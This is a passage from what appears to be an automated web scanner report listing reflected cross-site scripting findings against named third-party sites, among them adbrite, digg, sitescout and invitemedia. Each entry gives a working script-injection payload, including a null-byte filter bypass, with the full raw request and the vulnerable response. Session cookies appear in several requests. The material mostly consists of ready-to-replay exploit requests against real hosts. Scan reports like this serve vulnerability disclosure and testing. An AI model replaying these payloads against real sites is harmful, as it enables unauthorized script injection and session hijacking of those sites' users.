HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:28:39 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/76270152007<script>alert(1)</script>c5f391e0619
7.17. http://ads.adbrite.com/adserver/vdi/779045 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/779045

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8c95c<script>alert(1)</script>c39d081d6c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/7790458c95c<script>alert(1)</script>c39d081d6c9?d=17608843913132534 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:43:06 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/7790458c95c<script>alert(1)</script>c39d081d6c9
7.18. http://ads.adbrite.com/adserver/vdi/806205 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/806205

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 171e1<script>alert(1)</script>9b1cb3d1ccd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/806205171e1<script>alert(1)</script>9b1cb3d1ccd?d=3728e74c-7461-11e0-9185-00259009a9e4&r=http%3A//d.chango.com/m/s/AdBrite%3Fpartner_uid%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs"; rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUipONEpJrDEszMlIS60xrDGoMSzNN1DSUUpKzMtLLcoEq1GqrQUA"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:46:00 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/806205171e1<script>alert(1)</script>9b1cb3d1ccd
7.19. http://ads.adbrite.com/adserver/vdi/806205 [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/806205

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload c9203<script>alert(1)</script>12cc57e2eb0 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /adserver/vdi/806205?d=3728e74c-7461-11e0-9185-00259009a9e4&r=c9203<script>alert(1)</script>12cc57e2eb0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs"; rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUipONEpJrDEszMlIS60xrDGoMSzNN1DSUUpKzMtLLcoEq1GqrQUA"

Response (redirected)

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:40:30 GMT
Server: XPEHb/1.0
Content-Length: 123

Unsupported URL: /adserver/vdi/c9203<script>alert(1)</script>12cc57e2eb0MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY
7.20. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f436"-alert(1)-"09796207443 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=ad&ad_size=300x250&section=1521132&8f436"-alert(1)-"09796207443=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:10:11 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 02 May 2011 02:10:11 GMT
Pragma: no-cache
Content-Length: 4325
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ads.bluelithium.com/imp?8f436"-alert(1)-"09796207443=1&Z=300x250&s=1521132&_salt=2629575304";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A
...[SNIP]...
7.21. http://digg.com/tools/diggthis.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004206e"><script>alert(1)</script>8e049f903a4 was submitted in the REST URL parameter 1. This input was echoed as 4206e"><script>alert(1)</script>8e049f903a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /tools%004206e"><script>alert(1)</script>8e049f903a4/diggthis.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: digg.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:44:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-779404137262479208%3A203; expires=Tue, 03-May-2011 02:44:40 GMT; path=/; domain=digg.com
Set-Cookie: d=4613de18b6c542b61379940db09b5bbd6945796e3fc646c022194fedaff30823; expires=Sat, 01-May-2021 12:52:20 GMT; path=/; domain=.digg.com
X-Digg-Time: D=638324 10.2.129.49
Vary: Accept-Encoding
Cneonction: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16999

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/tools%004206e"><script>alert(1)</script>8e049f903a4/diggthis.js.rss">
...[SNIP]...
7.22. http://digg.com/tools/diggthis.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fac8d"><script>alert(1)</script>efc759f39a3 was submitted in the REST URL parameter 2. This input was echoed as fac8d"><script>alert(1)</script>efc759f39a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /tools/diggthis.js%00fac8d"><script>alert(1)</script>efc759f39a3 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: digg.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:44:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Tue, 03-May-2011 02:44:57 GMT; path=/; domain=digg.com
Set-Cookie: d=dbc3b6621d940455b22731ca1a1c09a089781e5816736e7f487763dbd8526321; expires=Sat, 01-May-2021 12:52:37 GMT; path=/; domain=.digg.com
X-Digg-Time: D=950979 10.2.129.156
Vary: Accept-Encoding
nnCoection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17000

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/tools/diggthis.js%00fac8d"><script>alert(1)</script>efc759f39a3.rss">
...[SNIP]...
7.23. http://guru.sitescout.com/tag.jsp [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcae3'%3balert(1)//08cf1cf24cb was submitted in the h parameter. This input was echoed as dcae3';alert(1)//08cf1cf24cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag.jsp?pid=66738FF&w=300&h=250dcae3'%3balert(1)//08cf1cf24cb&rnd=3547377&cm=http://click.adbrite.com/c/CvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0IpipwdLQBxuLrYZgyJ7S1PvGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWCXY9D2-QHOfg6pX0b9LTtaTQI8E9Y1hXVck9VT8EmRAoIKD-Hz3s10ZMQecjaqU1-wroyCzUm10G_MBmfksRDzlEfApCpYRe4nJ4H9-0oXD48jRc9TSMbik2vsesqhIsvKOysmRbXe1I-7Vja6eSCJtFt5tcQrjLwvpdsi29oHYRBPhO6ykaJrFmFxpw4brKP1BrwMo-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0/ HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ads-vrx.adbrite.com/adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 957
Date: Mon, 02 May 2011 02:26:10 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=66738FF&rw=1&cm=http%3A%2F%2Fclick.adbrite.com%2Fc%2FCvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250dcae3';alert(1)//08cf1cf24cb" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...
7.24. http://guru.sitescout.com/tag.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 797d2"%3balert(1)//dc8428cd2c7 was submitted in the pid parameter. This input was echoed as 797d2";alert(1)//dc8428cd2c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag.jsp?pid=66738FF797d2"%3balert(1)//dc8428cd2c7&w=300&h=250&rnd=3547377&cm=http://click.adbrite.com/c/CvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0IpipwdLQBxuLrYZgyJ7S1PvGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWCXY9D2-QHOfg6pX0b9LTtaTQI8E9Y1hXVck9VT8EmRAoIKD-Hz3s10ZMQecjaqU1-wroyCzUm10G_MBmfksRDzlEfApCpYRe4nJ4H9-0oXD48jRc9TSMbik2vsesqhIsvKOysmRbXe1I-7Vja6eSCJtFt5tcQrjLwvpdsi29oHYRBPhO6ykaJrFmFxpw4brKP1BrwMo-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0/ HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ads-vrx.adbrite.com/adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 957
Date: Mon, 02 May 2011 02:25:30 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=66738FF797d2";alert(1)//dc8428cd2c7&rw=1&cm=http%3A%2F%2Fclick.adbrite.com%2Fc%2FCvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0IpipwdLQBxuLrYZgyJ7S1PvGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWC
...[SNIP]...
7.25. http://guru.sitescout.com/tag.jsp [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c758f'%3balert(1)//df004e2400e was submitted in the w parameter. This input was echoed as c758f';alert(1)//df004e2400e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag.jsp?pid=66738FF&w=300c758f'%3balert(1)//df004e2400e&h=250&rnd=3547377&cm=http://click.adbrite.com/c/CvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0IpipwdLQBxuLrYZgyJ7S1PvGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWCXY9D2-QHOfg6pX0b9LTtaTQI8E9Y1hXVck9VT8EmRAoIKD-Hz3s10ZMQecjaqU1-wroyCzUm10G_MBmfksRDzlEfApCpYRe4nJ4H9-0oXD48jRc9TSMbik2vsesqhIsvKOysmRbXe1I-7Vja6eSCJtFt5tcQrjLwvpdsi29oHYRBPhO6ykaJrFmFxpw4brKP1BrwMo-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0/ HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ads-vrx.adbrite.com/adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 957
Date: Mon, 02 May 2011 02:25:50 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=66738FF&rw=1&cm=http%3A%2F%2Fclick.adbrite.com%2Fc%2FCvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300c758f';alert(1)//df004e2400e" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...
7.26. http://hit.blvdstatus.com/t [tid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hit.blvdstatus.com
Path:   /t

Issue detail

The value of the tid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7241e'%3balert(1)//f5921333a0a was submitted in the tid parameter. This input was echoed as 7241e';alert(1)//f5921333a0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /t?tid=BS-d8cfb33d-27241e'%3balert(1)//f5921333a0a HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: hit.blvdstatus.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:40:15 GMT
Server: Apache
Content-Type: text/javascript
Content-Length: 2974

var __seoq_h = 'http://hit.blvdstatus.com';var __seoq_o = true;var __seoq_t = 'BS-d8cfb33d-27241e';alert(1)//f5921333a0a';var __seoq_s = 'sd8c4dbe198f6eff30.86464733';
function __seoq_get_host(x)
{var m;if(m=x.match(/(http|ftp|https):\/\/(.*?)\/.*$/)){return m[2];}}
function BLVD(){var c=this._Get_Cookie('blvdS');if(c){
...[SNIP]...
7.27. http://insurancenewsnet.com/article.aspx [_TSM_HiddenField_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://insurancenewsnet.com
Path:   /article.aspx

Issue detail

The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff3e7'%3balert(1)//1e4b9f7a9ac was submitted in the _TSM_HiddenField_ parameter. This input was echoed as ff3e7';alert(1)//1e4b9f7a9ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /article.aspx?_TSM_HiddenField_=ctl00_tsm_HiddenFieldff3e7'%3balert(1)//1e4b9f7a9ac&_TSM_CombinedScripts_=%3b%3bAjaxControlToolkit%2c+Version%3d1.0.11119.20010%2c+Culture%3dneutral%2c+PublicKeyToken%3d28f01b0e84b6d53e%3aen-US%3af115bb7c-9ed9-4839-b013-8ca60f25e300%3a865923e8%3a91bd373d%3a596d588c%3a411fea1c%3ae7c87f07%3abbfda34c%3a30a78ec5%3a42b7c466 HTTP/1.1
Host: insurancenewsnet.com
Proxy-Connection: keep-alive
Referer: http://insurancenewsnet.com/article.aspx?id=257992
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pddqwnm3cm5gjqvccrmz1345; INNid=pddqwnm3cm5gjqvccrmz1345

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript
Expires: Mon, 30 Apr 2012 23:34:39 GMT
Last-Modified: Wed, 27 Apr 2011 14:28:05 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:34:39 GMT
Content-Length: 122119

//START AjaxControlToolkit.Common.Common.js
Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.BoxSide = function() {
}
AjaxControlToolkit.BoxSide.prototype = {
Top : 0,
Right : 1,

...[SNIP]...
false);
//END AjaxControlToolkit.PopupControl.PopupControlBehavior.js
if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded();
(function() {var fn = function() {$get('ctl00_tsm_HiddenFieldff3e7';alert(1)//1e4b9f7a9ac').value += ';;AjaxControlToolkit, Version=1.0.11119.20010, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:f115bb7c-9ed9-4839-b013-8ca60f25e300:865923e8:91bd373d:596d588c:411fea1c:e7c87f07:bbfd
...[SNIP]...
7.28. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68af2'%3balert(1)//795c1f771d3 was submitted in the admeld_callback parameter. This input was echoed as 68af2';alert(1)//795c1f771d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match68af2'%3balert(1)//795c1f771d3 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
